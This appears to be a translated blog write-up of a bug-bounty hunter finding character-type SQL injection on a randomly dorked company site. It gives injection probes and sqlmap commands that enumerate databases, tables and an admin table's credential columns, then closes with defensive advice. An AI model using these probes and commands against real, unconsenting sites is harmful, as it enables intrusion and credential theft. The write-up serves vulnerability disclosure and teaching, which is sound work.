Table of contents

I. Introduction

I submitted the vulnerability on the vulnerability box, and there is a project called public welfare SRC on it. Public welfare src is a platform for white hats to submit randomly discovered vulnerabilities. We can submit the vulnerabilities we randomly discovered or actively found in the vulnerability box. Do not cross the red line when mining src. In general, you only need to obtain the database name to prove the existence of the vulnerability when encountering SQL injection. It is best not to obtain it further. The xss vulnerability only obtains information such as its own cookie or ip to prove the existence of the vulnerability. When encountering information leakage, if there is a situation where sensitive files can be downloaded, the files must be deleted after the vulnerability is confirmed.

2. Mining process

1. Google Grammar Random Search

inurl:php?id=1

This Google grammar must be familiar to many friends. It is a very classic grammar used to search for websites that may have SQL injection vulnerabilities.

Friends who want to go to Google can look for fanqiang software or something. If you can’t find it, the edge browser that comes with win11 also supports this syntax, so you can try it.

2. Enter the website

For the convenience of operation, I copied the URL to the Firefox browser. You can see that there is an id parameter behind the top URL. Generally, we must be sensitive to seeing this parameter in vulnerability mining, because websites with this parameter may have The problem, first of all, among other things, the website that can display the id parameter uses the GET parameter transfer method. This parameter transfer method is easy to cause some information leakage, so in practice, it is best to use the POST parameter transfer method to transmit data, and minimize the Direct disclosure of information.

3. Injection point detection

For the convenience of operation, put the URL in the hakbar

After entering the following parameters, I found that a picture at the bottom of the website is missing, continue to test

id=1'

After entering the following parameters, it returns to normal (for the sake of confidentiality, here we use a map to cover it up for everyone)

id=1'and'1'='1

Enter the following parameters, and the picture reports an error again. This is a very typical character-type SQL injection vulnerability.

id=1'and'1'='2

3. SQLMAP blasting

Why should I use SQLmap? The first one is to improve efficiency. After all, SQLMAP is an automated tool that can help us blast database information more efficiently. The second is that I tried manual injection before and found that I couldn’t get much information, so I chose SQLMAP blasting.

In fact, according to the preliminary scanning information of SQLMAP, you can also see the SQL injection type, operating system, development language, database version and other information that exist on this website.

(1) Explosive library

It can be seen that the company currently has 5 available databases. In order to ensure the privacy of the company, all of them are coded except for the information_schema database.

In addition, when you are digging vulnerabilities, I personally suggest that the information_schema library should not be tampered with, because the key information of the entire database is stored in this database, and we cannot bear the responsibility if something goes wrong.

sqlmap -u URL --dbs

(2) Burst

sqlmap -u URL --tables -D 数据库名

Here I chose a database named by themselves, and as a result, the admin table popped up when I entered it. At that time, I guessed that the username and password must be stored in it.

(3) Burst field

sqlmap -u URL --columns -T 表名 -D 数据库名

As expected, through field blasting, two fields, account and userpass, were found in it. There may be user name and password in it (it’s just a guess, I dare not go any further), but for the sake of safety and my personal safety, I plan to Stopped there and filed a bug report on SRC

3. Summary

There are many defense methods for SQL injection, and it is also a common problem

1. 使用参数化查询：使用参数化查询可以防止SQL注入攻击。参数化查询是将SQL语句和参数分开发送到数据库，而不是将它们组合在一起。这样可以确保参数不会被解释为SQL代码。

2. 对输入进行验证和过滤：在将用户输入传递给数据库之前，应该对其进行验证和过滤。可以使用正则表达式或其他方法来验证输入是否符合预期格式。还可以过滤掉不必要的字符，例如单引号和双引号。

3. 最小化数据库权限：将数据库用户的权限限制为最小化，只允许其执行必要的操作。这样可以减少攻击者利用SQL注入漏洞的机会。

4.永远不要太相信用户输入的东西！


等等.............

When digging holes, everyone should also pay attention. Some very sensitive information will be ignored after being dug out. Don’t spread it at random, and don’t use it at will, otherwise the whole nature will change. Then remember to submit the vulnerability report in time. A just white hat is OK!

This is the first time I write this kind of practical article, please point out the bad parts! ! !

Remember my vulnerability mining practice - a company's SQL injection vulnerability